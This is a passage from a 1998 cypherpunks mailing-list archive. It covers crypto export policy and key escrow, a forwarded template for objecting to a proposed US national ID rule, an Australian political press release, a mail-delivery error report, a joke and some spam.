what kind of "trusted third party" intermediaries. But these questions are
exactly akin to the details to be worked out with GAK and self-escrow.

In answer to the question: "Is there anything at all different between this
proposal and GAK?", the answer is some, and the differences might be
relevant to some. This proposal is a little better than GAK for law
enforcement because it would be easier to use and they tend to be
technically unsophisticated. It is a little worse than GAK for the NSA
because the extra data flows mean that it is harder to conduct surveillance
in a totally undetectable way. It favors some vendors over others because
it favors those who want to encrypt at firewalls over those who want to
encrypt end-to-end. It might slow overall progress in network security
because end-to-end encryption is technically superior (though harder to
deploy) and universal firewall to firewall encryption might reduce the
demand for it.

In answer to the question: "Would approval of this proposal be a good or a
bad thing?", the answer is ambiguous for the civil libertarian side. Any
time a new thing is allowed to be exported, it increases the flexibility of
vendors in crafting solutions and is likely to increase overall security.
On the other hand, anything which makes continuation of export controls
less in-your-face-painful will decrease pressure to repeal them and
therefore may in the long run decrease overall security. And anything which
makes it easier to make systems secure against all attackers other than Big
Brother brings closer the disasterous day when non-GAK crypto can be
outlawed.

If you're Big Brother, approval seems to be uniformly a good thing. It
garners political points among the unsophisticated as being willing to make
"technical compromises". It costs nothing in terms of access. And it may
bring closer the glorious day when non-GAK crypto can be outlawed.

     --Charlie Kaufman






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED/EUREKA! <stuffed@stuffed.net>
Date: Wed, 15 Jul 1998 12:17:18 -0700 (PDT)
To: All Eureka/Stuffed Subscribers: ;
Subject: Could the world turn lesbian?/Men's privates enlarging
Message-ID: <19980715161601.28080.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/html

Click for STUFFED: Wednesday July 15 1998


<img src=http://stuffed.net/98/7/15/cover.gif width=300
height=380 border=0 alt='Click here for STUFFED, the new daily
 tabloid news, humor and babes newspaper from Eureka!'>

This is a combined text/html email. If your email client can
display html web pages  you probably won't see this text but
should see the front cover of today's issue above, which you
should  click on to read.  If you cannot see the cover, your
email client either cannot display html or its' options have
been set to  ignore html images.  In which case,  please ...
Click here to read today's! --> http://stuffed.net/98/7/15/

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 15 Jul 1998 14:41:58 -0700 (PDT)
To: cypherpunks@toad.com
Subject: NYT Crypto OpEd
Message-ID: <199807152141.RAA24473@camel7.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


The NYT has a fairly good OpEd on encryption today,
written by a novelist, who makes a good case for 
the citizen's need for the privacy protection, now that
there are a zillion ways computers pry into private
affairs.

   http://www.nytimes.com

For those outside the US: NYT today began its free 
worldwide online service, so the whole world can log 
on to its prying computers. (Non-USes heretofore 
had to pay for privacy loss.) It claims to have 4 million 
daily online consumers and is happy to run an advertiser 
drivern operation to suck in millions more around the 
planet.

Take note, Slate.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Global Web Builders <gwb@gwb.com.au>
Date: Wed, 15 Jul 1998 01:45:14 -0700 (PDT)
To: (Recipient list suppressed)
Subject: Aboriginal voting and the 1967 Referendum
Message-ID: <1.5.4.32.19980715075812.00734c6c@gwb.com.au>
MIME-Version: 1.0
Content-Type: text/plain


Dear One Nation supporter in NSW

I would draw your attention to the following press release by Pauline Hanson
today:

Aboriginal voting and the 1967 Referendum 

It is clear Pauline Hanson is often misrepresented by the press and the
recent headlines headlines that suggest she questioned Aboriginal
Australian's rights to vote is yet another example of selective reporting.
Is this because of the search for what will be the most inflammatory or is
it just that some members of the press pick out of context what they believe
will do the most damage to Pauline Hanson? 

"I have not and would not question the right to vote of any Australian
citizen. What I question is whether Australians would have thought twice
about their vote in the 1967 referendum if they had known their attempt to
bring about equality was going to cause the pendulum to go the other way. 

"The main point of the 1967 referendum was the change of section 51 of the
constitution that allowed the government to make special laws with respect
to Aborigines. It is from this that successive governments have created race
based policies such as Abstudy and 1.5% loans for Aboriginals starting
businesses. 

"Aboriginal Australians like all Australians should and do have the right to
vote but no one should be treated differently on the basis of race - all
Australians should be treated equally and the same. I am quite certain that
if Australians had understood
where the 1967 referendum would lead, many would have voted differently. 

"These special laws based on race have led to reverse discrimination and the
rorting of taxpayers money without helping the Aborigines in most need. We
must assist Aborigines, but as Australians in need, not on the basis of
race. We must not make
laws that set Australians apart and are open to abuse by those who pretend
to look after the Aboriginal people. 

"It is often reported that I want to take benefits from Aboriginal people,
that is not correct and never was correct. It is true many Aboriginal people
are seriously disadvantaged but they do not have a monopoly on being
disadvantaged and should not
be singled out on the basis of race. Everyone should be assisted on the
basis of need." 

Statement issued by Pauline Hanson MP, member for Oxley 

-----------

GWB



Scott Balson





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cyberdog <eric@clever.net>
Date: Wed, 15 Jul 1998 15:17:32 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Whitehouse Bastards want my name named.
Message-ID: <v03110700b1d2da9aa6a0@[204.249.244.13]>
MIME-Version: 1.0
Content-Type: text/plain


Blumenthal Discovery requests both the Email subscriber list to
Drudge Report AND contributor list to Drudge Legal Defense
Fund...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anton Sherwood <antons@jps.net>
Date: Wed, 15 Jul 1998 21:12:04 -0700 (PDT)
To: sflp-announce@tanith.skylee.com
Subject: your papers please
Message-ID: <35AD7D5B.31E5@jps.net>
MIME-Version: 1.0
Content-Type: message/rfc822


To: silent-tristero@world.std.com
Subject: DOT ID card info
From: t byfield <tbyfield@panix.com>
Date: Tue, 14 Jul 1998 18:53:22 -0400
Reply-To: t byfield <tbyfield@panix.com>
Sender: silent-tristero-approval@world.std.com


From: "ScanThisNews" <mcdonalds@airnet.net>
To: "Scan This News Recipients List" <scan@efga.org>
Subject: [FP] DoT National ID Objection Letters - Format and Subjects
Date: Fri, 10 Jul 1998 11:07:37 -0500
Reply-To: owner-scan@efga.org
X-Web-Site: http://www.efga.org/
X-Mail-List-Info: http://efga.org/about/maillist/
X-SCAN: http://www.networkusa.org/fingerprint.shtml

======================================================================
SCAN THIS NEWS
7/9/98

Included below is the address and letter format information for objecting
to the DoT proposed standard driver's license regulation. If implemented
as presently written, the Department of Transportation (DoT) regulation
will result in a National Identification Document (NID) system in the
United States. Once in place, no one will be allowed to travel, open bank
accounts, obtain health care, get a job or purchase firearms without first
presenting the proper government documents.

Under the Administrative Procedures Act, the public is allowed to
submit written objections during the 30 day comment period. Comments
must be submitted in writing. The notice of proposed rule making did
not recognize other forms of comments such as phone calls or email
submissions.

After the comment period deadline, the agency must consider all comments
and must provide a statement supporting their decision to override public
objections.

DEADLINE: Comments must be received by August 3, 1998.

PAGE LIMIT: The page limit is 15 pages, however additional pages of relevant
supporting material may be included.

NOTE: The agency requests but does not require that two copies be sent to
the Docket Management address provided below.

NOTICE: The NHTSA also mailed copies of the proposed rule to all Highway
Safety officials and to the motor vehicle administrators of each State.
They too will be submitting comments.

PUBLIC VIEWING: Copies of all documents will be placed in Docket No.
NHTSA-98-3945; in Docket Management, Room PL-401, Nassif Building, 400
Seventh Street, SW, Washington, DC 20590. (Docket hours are Monday-Friday,
10 a.m. to 5 p.m., excluding Federal holidays.)

Also provided at the bottom of this page are some suggestions for
arguments which may be used in objecting to the proposed rule. These
arguments will hopefully stimulate further thought.

Objections do not have to raise legal issues, but they should be concisely
written and clearly state the nature of each objection.

This information will also be posted on the NetworkUSA "Fingerprint"
web page: <www.networkusa.org>


             [LETTER FORMAT]

---------------[CUT HERE]------------------

[YOUR NAME]
[YOUR ADDRESS

[DATE, 1998]

Docket Management, Room PL-401
National Highway Traffic Safety Administration
Nassif Building
400 Seventh Street, S.W.
Washington, D.C. 20590

Re:   Docket No. NHTSA-98-3945
      DOCID:fr17jn98-28
      23 CFR Part 1331: Proposed Rule - State-Issued Driver's Licenses
                        and Comparable Identification Documents

Dear Sirs,

In the Federal Register of June 17, 1998 (Volume 63, Number 116, pages 33219
through 33225), your agency proposed certain regulations pursuant to the
Omnibus Consolidated Appropriations Act of 1997, P.L. 104-208, 110 Stat.
3009, and specifically $656 thereof, 110 Stat. 3009-716, which will be
codified in 23 C.F.R. Part 1331; further, comments from the public were
invited regarding these proposed regulations. My objections to the proposed
rule, and suggestions for modification, are as follows:


                            [BODY OF LETTER]
                            [BODY OF LETTER]
                            [BODY OF LETTER]
                            [BODY OF LETTER]


I wish to be informed of any proposed amendments to these rules or their
adoption.


Sincerely,

[YOUR SIGNATURE]
[YOUR NAME]


---------------[CUT HERE]------------------

Additional information about the regulation can be found at:
http://www.networkusa.org/fingerprint/page1b/fp-dot-id-scan-notice.html

-------------------------------------------

Some examples of reasons for objecting to the proposed rule:

[version date 7/7/98]
[Please send any corrections to <fingerprint@networkusa.org>]

UNCONTESTED FACTS:

An unconstitutional law is void from the date of its enactment.

An unconstitutional law cannot serve as the basis for an agency
regulation, and an agency may not knowingly adopt an unconstitutional
rule or regulation.


CONSTITUTIONAL OBJECTIONS:

   o First Amendment Religious Objections:

     OBJECTION:
     Certain religious faiths hold that followers are not to be
     numbered. This rule will abridge the right of practitioners
     of these traditional religions in the free exercise thereof.

     ARGUMENT:
     The First Amendment to the U.S. Constitution prohibits Congress from
     making any law which prohibits, impedes, or interferes with the free
     exercise of religion.

     The proposed rule will result in all states mandatorily requiring
     submission of Social Security numbers as a condition to being
     issued driver's licenses. Anyone who is opposed to using SSNs for
     identification purposes due to religious beliefs, will be denied a
     driver's license. The result will be that practitioners of any faith
     which includes a teaching against being numbered will be denied the
     right to drive if they exercise their religious belief.

     PREMISE FOR OBJECTION:
     The Holy Bible establishes by example the principle that Christians
     are not to be numbered. King David wanted to "know the number of the
     People" under his authority (2 Samuel 24:2). And, Satan caused David
     to number all Israel (1 Chronicles 21:1). God's Word further states
     that David's command to number Israel "was evil in the sight of God"
     (1 Chronicles 21:7). Because of the People's acquiescence to the
     king's enumeration plan, God sent a plague UPON THE PEOPLE
     (1 Chronicles 21:14).

     The Bible warns of a government system which will require everyone to
     be numbered -- contrary to God's will. Regarding this system the Bible
     states:

        "And he causeth all, the small and the great, and the rich and the
        poor, and the free and the bond, that there be given them a mark on
        their right hand, or upon their forehead;
        "and that no man should be able to buy or to sell, save he that hath
        the mark, (even) the name of the beast or the number of his name."
        (Rev. 13:16-17)

     But believers are warned not to participate in this numbering
     system:

        "And another angel, a third, followed them, saying with a great
        voice, If any man worshippeth the beast and his image, and
        receiveth a mark on his forehead, or upon his hand,
        "he also shall drink of the wine of the wrath of God, which is
        prepared unmixed in the cup of his anger; and he shall be
        tormented with fire and brimstone in the presence of the holy
        angels, and in the presence of the Lamb:
        "and the smoke of their torment goeth up for ever and ever;
        and they have no rest day and night, they that worship the beast
        and his image, and whoso receiveth the mark of his name."
        (Rev. 14:9-11).

     According to Daniel, this "beast" is a "king," which in our
     modern-day world is a government system.
     (Daniel 7:17-23, Rev. 19:19).

     CONCLUSION:
     The proposed rule must make exceptions for believers who have a
     sincerely held religious objection to using numbers for universal
     identification.


   o Fourth Amendment Protection:

     OBJECTION:
     The proposed rule will result in individuals being subjected to
     unreasonable detention, investigation, and questioning, i.e.,
     searches and seizures.

     ARGUMENT:
     The United States Constitution protects all individuals in the
     security of their personal papers and effects against all unreasonable
     searches and seizures; and that no exception shall be made to this
     prohibition unless a sworn affidavit is presented upon probable
     cause and then only after a subsequent Warrant has been issued
     by a court of competent jurisdiction.

     PREMISE FOR OBJECTION:
     In implementation, under the proposed rule every individual will
     be subjected to scrutiny of their personal affairs. They will be
     detained while verification of their social security number is
     confirmed. The act of demanding proof of a social security number
     card constitutes an unreasonable search and seizure of a person's
     papers and effects.

     CONCLUSION:
     The rule may not impose any condition where information will be
     mandated or the submission of personal information is required
     except when done in accordance with the Fourth Amendment to the
     United States Constitution. The rule must be changed to preserve
     this constitutional protection.


   o Constitutional Right to Travel.

     OBJECTION:
     The rule, as presently written, will unlawfully abridge citizens'
     right to travel.

     ARGUMENT:
     Americans have a constitutional right to travel the roads of
     their respective state which is an integral component of any
     American's pursuit of happiness. This rule will have the effect
     of state citizens being denied the right to drive on state roads
     simply for failing to comply with the consequential requirements
     of a federal regulation. The requirement that all drivers must
     have SSNs constitutes a new condition precedent to obtaining a
     driverbs license, yet possession of a SSN has no bearing upon
     the ability to drive a car. This requirement thus is an
     unconstitutional abridgement of every citizen's right to travel.

     PREMISE FOR OBJECTION:
     Every citizen has a constitutional right to work for a living; see
     State v. Polakowbs Realty Experts, Inc., 243 Ala. 441, 10 So.2d 461,
     462 (1942). But beyond this constitutional right, they further have
     the constitutional right to travel which is protected by the United
     States Constitution; see Crandall v. Nevada, 73 U.S. (6 Wall.) 35,
     49 (1868)("We are all citizens of the United States, and as members
     of the same community must have the right to pass and repass through
     every part of it without interruption, as freely as in our own
     states"); Kent v. Dulles, 357 U.S. 116, 125, 78 S.Ct. 1113 (1958)
     ("The right to travel is a part of the Nlibertyb of which the citizen
     cannot be deprived without the due process of law under the Fifth
     Amendment"); Shapiro v. Thompson, 394 U.S. 618, 629, 89 S.Ct. 1322
     (1969) ("This Court long ago recognized that the nature of our
     Federal Union and our constitutional concepts of personal liberty
     unite to require that all citizens be free to travel throughout the
     length and breadth of our land uninhibited by statutes, rules, or
     regulations which unreasonably burden or restrict this movement");
     and Dunn v. Blumstein, 405 U.S. 330, 339, 92 S.Ct. 995 (1972)("[S]ince
     the right to travel was a constitutionally protected right, Nany
     classification which serves to penalize the exercise of that right,
     unless shown to be necessary to promote a compelling governmental
     interest, is unconstitutionalb"). See also Schachtman v. Dulles, 225
     F.2d 938,941 (D.C.Cir. 1955)("The right to travel, to go from place to
     place as the means of transportation permit, is a natural right subject
     to the rights of others and to reasonable regulation under law");
     Bergman v. United States, 565 F.Supp. 1353, 1397 (W.D. Mich. 1983)
     ("The right to travel is a basic, fundamental right under the
     Constitution, its origins premised upon a variety of constitutional
     provisions"); and Lee v. China Airlines, Ltd., 669 F.Supp. 979, 982
     (C.D.Cal. 1987)("[T]he right to travel interstate is fundamental").

     This right to travel is also a constitutional right embodied within
     the several states' constitutions.

     CONCLUSION:
     The new rules should be amended so as to eliminate the SSN
     requirement for driverbs licenses issued to domestic Americans so as
     to assure that no domestic American will be denied their right to
     travel the roads of their state simply for the lack of a SSN.


   o Supreme Court Decisions.

     OBJECTION:
     The rule, in implementation, will violate the fundamental legal
     principle of dual sovereignty by compelling the states to implement
     a federal regulatory scheme. The effect of this proposed rule will
     be the abridgment of citizens' constitutional rights.

     ARGUMENT:
     Neither Congress nor any federal agency may compel a state or states'
     officers to implement or enforce a federal regulatory program.

     PREMISE FOR OBJECTION:
     In implementation, the states will be compelled to comply with these
     federal guidelines in the issuance of all driver's license documents.
     Section 1331.6 of the proposed regulation plainly demands that all
     states must obtain SSNs from "every applicant for a license or
     document," and further requires that every state confirm the
     applicant's SSN with the Social Security Administration (SSA). But
     under the U.S. Constitution, Congress simply does not possess the
     power to regulate the issuance of driverbs licenses by the states
     of this Union; nor may Congress dictate to the states how to issue
     driverbs licenses.

     The United States Supreme Court has ruled that the federal government
     may not, neither through Congressional Acts nor Administrative Policy,
     conscript the states nor their officers to implement a federal
     regulatory scheme. In the case of New York v. United States the Court
     ruled:

        "if a federal interest is sufficiently strong to cause Congress
        to legislate, it must do so directly; it may not conscript state
        government as its agents."

     And in the case of Printz v. U.S. the Court ruled:

        "The Federal Government may neither issue directives requiring
        the States to address particular problems, nor command the States'
        officers, or those of their political subdivisions, to administer
        or enforce a federal regulatory program. It matters not whether
        policy making is involved, and no case by case weighing of the
        burdens or benefits is necessary; such commands are fundamentally
        incompatible with our constitutional system of dual sovereignty."

     CONCLUSION:
     The rule must be rewritten so as not to compel the states to act
     in furtherance of the federally proposed regulatory SSN collecting
     scheme; or to compel the states to standardize their state issued
     licenses to conform to federal guidelines.


OTHER LEGAL OBJECTIONS:


o Privacy Act Prohibition

     OBJECTION:
     In implementation, the proposed rule will result in violations of
     the Privacy Act of 1974.

     ARGUMENT:
     The Privacy Act prohibits any federal, state, or local agency from
     denying any individual a benefit, right, or privilege due to the
     individual's refusal to divulge a social security number UNLESS the
     submission is REQUIRED BY FEDERAL LAW. There IS NO federal law which
     requires any state licensing agency to obtain social security numbers
     from license applicants; furthermore, if there were such a federal
     law imposing any such requirement upon a state licensing agency, the
     law would be fundamentally unconstitutional under the U.S. Supreme
     Court's New York and Printz rulings.

     PREMISE:
     The privacy Act of 1974 (Public Law 93-579) Section 7 states:

        "(a)(1) It shall be unlawful for any Federal, State or local
        government agency to deny to any individual any right, benefit,
        or privilege provided by law because of such individual's
        refusal to disclose his social security account number.
        "(2) the (The) provisions of paragraph (1) of this subsection
        shall not apply with respect to -
        "(A) any disclosure which is required by Federal statute, or
        "(B) the disclosure of a social security number to any Federal,
        State, or local agency maintaining a system of records in existence
        and operating before January 1, 1975, if such disclosure was
        required under statute or regulation adopted prior to such date
        to verify the identity of an individual.
        "(b) Any Federal, State, or local government agency which requests
        an individual to disclose his social security account number shall
        inform that individual whether that disclosure is mandatory or
        voluntary, by what statutory or other authority such number is
        solicited, and what uses will be made of it."

     Congress has no authority to compel a state agency to obtain social
     security numbers -- except with regard to state administered,
     federally funded welfare programs. However, Congress does have the
     right to LIMIT the uses that may be made of the federally assigned
     numbers; which is what the Privacy Act does.

     In practice, the effect of the proposed rule will be that state
     driver's licensing agencies will deny driver licenses to individuals
     who do not supply a social security number. This practice will
     violate the clear intent of the Privacy Act.

     The Social Security Act provides penalties for anyone who compels the
     disclosure of an individual's social security number in violation of
     federal law. Title 42 U.S. Code, section 408(a)(8) states:

        "[Whoever] discloses, uses, or compels the disclosure of the social
        security number of any person in violation of the laws of the United
        States; shall be guilty of a felony and upon conviction thereof
        shall be fined under title 18 or imprisoned for not more than five
        years, or both."

     The Privacy Act prohibits any state agency from compelling an
     individual to disclose their social security number unless the
     disclosure is required by federal law. There is no federal law
     which does (or lawfully could) require a state agency to compel
     the disclosure of a driver license applicant's social security
     number. The effectual result of the proposed rule will be that
     driver's license applicants will be denied a benefit, right, or
     privilege for refusing to supply a social security number. This
     practice will violate Title 42 U.S.C., 408(a)(8). Such violations
     will likely result in a multitude of lawsuits and possibly even
     criminal prosecutions against state officials.

     CONCLUSION:
     The rule must be rewritten so as to clearly reaffirm that a state
     agency may not deny to any individual any benefit, right, or
     privilege due to the individual's refusal to obtain, or provide to
     the agency, a federally assigned social security number; and to
     reaffirm that state agencies must comply with the Privacy Act any
     time a social security number is requested.


   o Limited Class of People Who May Acquire Social Security Numbers:

     OBJECTION:
     The proposed rule will effectively limit driving to the limited
     classes of individuals who may be assigned social security
     numbers.

     ARGUMENT:
     There is no compelling police power interest in limiting the
     right to drive to only the limited classes of individuals that
     may be assigned social security numbers.

     PREMISE FOR OBJECTION:
     The Social Security Act, codified at Title 42 U.S. Code, Section
     405(c), sets out the limited class of individuals to whom the
     Commissioner of Social Security may assign numbers. The classes
     are: 1) aliens, 2) applicants for social benefits, and 3) children
     of the members of either of these two classes at the request of
     the parents or at the time they enter school. According to well
     established legal principles, the Commissioner is not authorized
     to (and therefore he may not) assign numbers to any individual who
     falls outside one of the classes set out at section 405(c).

     NOTE: If there are any other classes of Americans who may be
           assigned Social Security numbers, please so advise me
           and please provide the statutory authority.

     At the federal level, a principle of law holds that in order for
     a federal employee to perform any given act, he must be authorized
     by statute to do so. This principle is shown by a wealth of cases,
     (See United States v. Spain, 825 F.2d 1426 (10th Cir. 1987); United
     States v. Pees, 645 F. Supp. 697 (D. Col. 1986); United States v.
     Hovey, 674 F. Supp. 161 (D. Del. 1987); United States v. Emerson,
     846 F. 2d 541 (9th Cir. 1988); United States v. McLaughlin, 851 F.
     2d 283 (9th Cir. 1988); United States v. Widdowson, 916 F.2d 587,
     589 (10th Cir. 1990).

     The only federal law which authorizes the assignment of SSNs to
     anyone is found in the above quoted passage of 42 U.S.C., $405,
     and these classes do not include all the citizens of each state
     who are otherwise qualified to drive.

     The rule presently makes a special exception for aliens lawfully
     admitted to the United States who may not be issued Social Security
     cards. However, the rule does not presently make any similar
     exceptions for domestic Americans who cannot be, or have not been,
     or do not choose to be, assigned Social Security cards or numbers.
     Since some domestic Americans (who are otherwise qualified to drive)
     have NOT been, may NOT be, or do not choose to be, assigned Social
     Security numbers, the resultant effect of the rule, as presently
     written, will be that the right to drive will only be recognized for
     the limited class of individuals who are authorized to be assigned
     a Social Security number and have subsequently been assigned such
     number.

     In a recent letter from the Social Security Administration, signed
     by Mr. Charles H. Mullen, Associate Commissioner, the Agency states:

        "The Social Security Act does not require a person to have a
        Social Security number (SSN) to live and work in the United
        States, nor does it require an SSN simply for the purpose of
        having one."

     CONCLUSION:
     The proposed rule must make exceptions for citizens who have NOT
     been (or may NOT be) assigned Social Security numbers but are
     otherwise qualified to drive and be issued a driver's license.


OTHER CONCERNS:


   o The Act (P.L. 104-208) Prohibits Establishment of National ID Card:

      OBJECTION:
      The proposed rule violates the very Act it purports to implement.

      ARGUMENT AND PREMISE:
      The Act, at Section 404(h)(2), states that provisions contained
      within the Act shall not be used as an excuse for the establishment
      of a national identification card. However, the proposed rule will
      result in the establishment of a national identification card, i.e.,
      standardized state issued driver's license cards using Social
      Security numbers as a universal identifier will become nationally
      standardized and universally recognized identification documents.

      CONCLUSION:
      The proposed rule must be changed so that it will not result in
      the establishment of a national identification card.


   o Social Security Numbers Are Not to be Used for Identification:

      OBJECTION:
      The rule will establish a national identification system in the
      United States using social security numbers as the universal
      identifier in clear violation of historically established public
      policy.

      ARGUMENT AND PREMISE:
      The official U. S. government policy has always consistently been that
      it is not desirable to establish any form of national identification
      document in the U.S., and that social security numbers are not to be
      used for universal identification purposes. For example:

      - In 1971, a Social Security Administration task force issued a
      report which stated that the Social Security Administration should
      do nothing to promote the use of the social security number as an
      identifier.
      - In 1973, a report of the HEW Secretary's "Advisory Committee on
      Automated Personal Data System" concluded that the adoption of a
      universal identifier by this country was not desirable; it also
      found that the social security number was not suitable for such a
      purpose as it does not meet the criteria of a universal identifier
      that distinguishes a person from all others.
      - In 1974, Congress enacted the Privacy Act (P.L. 93-579) to limit
      governmental use of the social security number. It provided that
      no State or local government agency may withhold a benefit from a
      person simply because the individual refuses to furnish his or her
      social security number.
      - Also in 1974, the U. S. Attorney General established the "Federal
      Advisory Committee on False Identification" (FACFI) to study the
      cost to society of false ID crimes and to formulate potential
      solutions for reducing the number of these crimes. The Committee
      concluded in its report that "[a] federally-controlled national
      identification system is undesirable."
      - In 1976, the Federal Advisory Committee on False Identification
      (FACFI) recommended that penalties for misuse of social security
      numbers should be increased, and again it rejected the idea of
      using social security numbers as a national identifier.
      - In 1977, the Carter Administration proposed that the Social
      Security card be one of the authorized documents an employer could
      use to assure that a job applicant could work in this country, but
      they also stated that the social security number card should not
      become a national identity document.
      - In 1979, the Social Security Administration published an official
      "Policy Statement" regarding social security numbers, ((PPD-23),
      SSR 79-18: SOCIAL SECURITY NUMBERS). In it, the Administration
      stated that the agency should "avoid unilateral policies that would
      push the SSN toward a universal identifier status." Final regulations
      covering this policy were published in the Federal Register on
      February 20, 1979, at 44 FR 10369.
      - In 1981, the Reagan Administration stated that it "is explicitly
      opposed to the creation of a national identity card" with regard to
      changes proposed to social security number cards; even though it
      recognized the need for a means for employers to comply with the
      employer sanctions provisions of its immigration reform legislation.
      - In 1993, President Bill Clinton proposed a universal Health
      Insurance identification card which used the social security number
      for identification. He even appeared on television showing a sample
      version of the ID card. It was later learned that the executive-level
      plan to establish a national ID had been devised during "secret
      meetings" held by the Presidentbs wife, Hillary Clinton. However,
      Congress and the public both rejected the national identification
      document scheme.
      - In 1996, Congress passed the Illegal Immigration Reform Act which
      authorized the use of social security numbers for verifying employment
      eligibility of aliens. Section 404 of the Act stated that nothing in
      the Act was to be construed to authorize, directly or indirectly,
      the issuance or use of national identification cards.
      - And currently, the Social Security Agency offers a publication
      entitled "Social Security - Your Number" in which it states that a
      person should not use their social security card or number for
      identification.

      (All of the above information was taken from U. S. government documents
      including material published by the Social Security Administration.
      See also the Social Security Administration's own Internet home page
      regarding the history of SSNs at:
      http://www.ssa.gov/history/ssnchron.html)

      CONCLUSION:
      The rule must be rewritten so as not to violate public policy by
      implementing a national identification system.



   o The proposed rule will unlawfully impact all domestic American.

     OBJECTION:
     The rule will result in all citizens being subjected to the rule's
     identification verification requirements; however, the Act was only
     intended to apply to illegal immigrants. Domestic Americans should
     not be subjected to the rule's identification requirements.

     ARGUMENT:
     The Act was not written to regulate domestic Americans, only
     illegal aliens.

     PREMISE FOR OBJECTION:
     The Illegal Immigration Reform and Immigrant Responsibility Act
     of 1996, Public Law 104-208 (the law which the subject rule
     purports to implement) was enacted to address the problem of
     illegal immigration by identifying illegal immigrants. The Act
     does not contemplate subjecting "all" individuals to any type
     of proof of citizenship -- which will be the resultant effect
     if the rule is implemented as presently written. The rule will
     regulate the whole population of the country instead of the
     very small category of individuals for which the Act was
     intended.

     CONCLUSION:
     There is no statutory or constitutional authority for
     subjecting citizens to the legal immigration verification
     requirements set out under the proposed rule.

-------------------------

FOR FURTHER INFORMATION REGARDING SUBMISSION OF COMMENTS CONTACT:
Mr. William Holden, Chief, Driver Register and Traffic Records Division,
(202) 366-4800


Reply to: <fingerprint@networkusa.org>
=======================================================================
 To subscribe to the free Scan This News newsletter, send a message to
     <majordomo@efga.org> and type "subscribe scan" in the BODY.
    Or, to be removed type "unsubscribe scan" in the message BODY.
   For additional instructions see www.efga.org/about/maillist.html
-----------------------------------------------------------------------
             "Scan This News" is Sponsored by S.C.A.N.
           Host of the "FIGHT THE FINGERPRINT!" web page:
                www.networkusa.org/fingerprint.shtml
=======================================================================







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Wed, 15 Jul 1998 22:14:24 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Atilla Remailer Down...
Message-ID: <009C93C6.999133A0.1@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	MX%"Postmaster@west.cscwc.pima.edu"  "SMTP delivery agent" 15-JUL-1998 22:13:46.82
To:	MX%"lreed@west.cscwc.pima.edu"
CC:	
Subj:	SMTP delivery error

Return-Path: <>
Date: Wed, 15 Jul 1998 22:13:44 MST
From: SMTP delivery agent <Postmaster@west.cscwc.pima.edu>
To: <lreed@west.cscwc.pima.edu>
Subject: SMTP delivery error
X-Report-Type: Nondelivery; boundary="> Error description:"

Note: this message was generated automatically.

An error was detected while processing the enclosed message.  A list of
the affected recipients follows.  This list is in a special format that
allows software like LISTSERV to automatically take action on incorrect
addresses; you can safely ignore the numeric codes.

--> Error description:

Error-For:  attila@prime.net
Error-Code: 2
Error-Text: %MX_SMTP-F-GENERIC_FAILURE, unknown failure status
            -(Via prime.net)
  -Transcript:
    -Rcvd: 220 webm4.ntx.net ESMTP Sendmail 8.8.5/8.8.5; Wed, 15 Jul 1998 21:58:47 -0700 (PDT)
    -Sent: HELO west.cscwc.pima.edu
    -Rcvd: 250 webm4.ntx.net Hello west.wc.pima.edu [144.90.64.14], pleased to meet you
    -Sent: MAIL FROM:<lreed@west.cscwc.pima.edu>
    -Rcvd: 250 <lreed@west.cscwc.pima.edu>... Sender ok
    -Sent: RCPT TO:<attila@prime.net>
    -Rcvd: 571 <attila@prime.net>... [144.90.64.14] not permitted to relay from <lreed@west.cscwc.pima.edu> to <attila@prime.net>

Error-End:  1 error detected

------------------------------ Rejected message ------------------------------
Received: by west.cscwc.pima.edu (MX V4.2 VAX) id 21; Wed, 15 Jul 1998 22:13:22 MST
Date: Wed, 15 Jul 1998 22:13:22 MST
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
To: attila@prime.net
Message-ID: <009C93C6.3E06C0E0.21@west.cscwc.pima.edu>
Subject: Sure, you *claim* you're a Deacon...


"Evangelists do more than lay people."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Wed, 15 Jul 1998 20:24:46 -0700 (PDT)
To: "Jean-Claude Bouthillier" <sidanie@ibm.net>
Subject: [humor]
Message-ID: <199807160338.XAA02713@cti06.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain



      In Computer Heaven:
         The management is from Intel,
         The design and construction is done by Apple,
         The marketing is done by Microsoft,
         IBM provides the support,
         Gateway determines the pricing.

      In Computer Hell:
         The management is from Apple,
         Microsoft does design and construction,
         IBM handles the marketing,
         The support is from Gateway,
         Intel sets the price.



Jean-Francois Avon, B.Sc. Physics, Montreal, Canada
  DePompadour, Socit d'Importation Lte
     Limoges fine porcelain and french crystal
  JFA Technologies, R&D physicists & engineers
     Instrumentation & control, LabView programming
PGP keys: http://bs.mit.edu:8001/pks-toplev.html
PGP ID:C58ADD0D:529645E8205A8A5E F87CC86FAEFEF891
PGP ID:5B51964D:152ACCBCD4A481B0 254011193237822C






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dennis e strausser jr <katt@nbn.net>
Date: Thu, 16 Jul 1998 00:10:58 -0700 (PDT)
To: cypherpunks@toad.com
Subject: show me
Message-ID: <35ADD147.713B@nbn.net>
MIME-Version: 1.0
Content-Type: text/plain


I will not say much
  give me what you have




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stockpro@public.usa.com
Date: Fri, 11 Dec 1998 00:17:02 -0800 (PST)
Subject: Grand prize 10 day trip to HAWAII...Enter the drawing!!!!.
Message-ID: <690.100987.666524@user00923.mitc.net>
MIME-Version: 1.0
Content-Type: text/plain



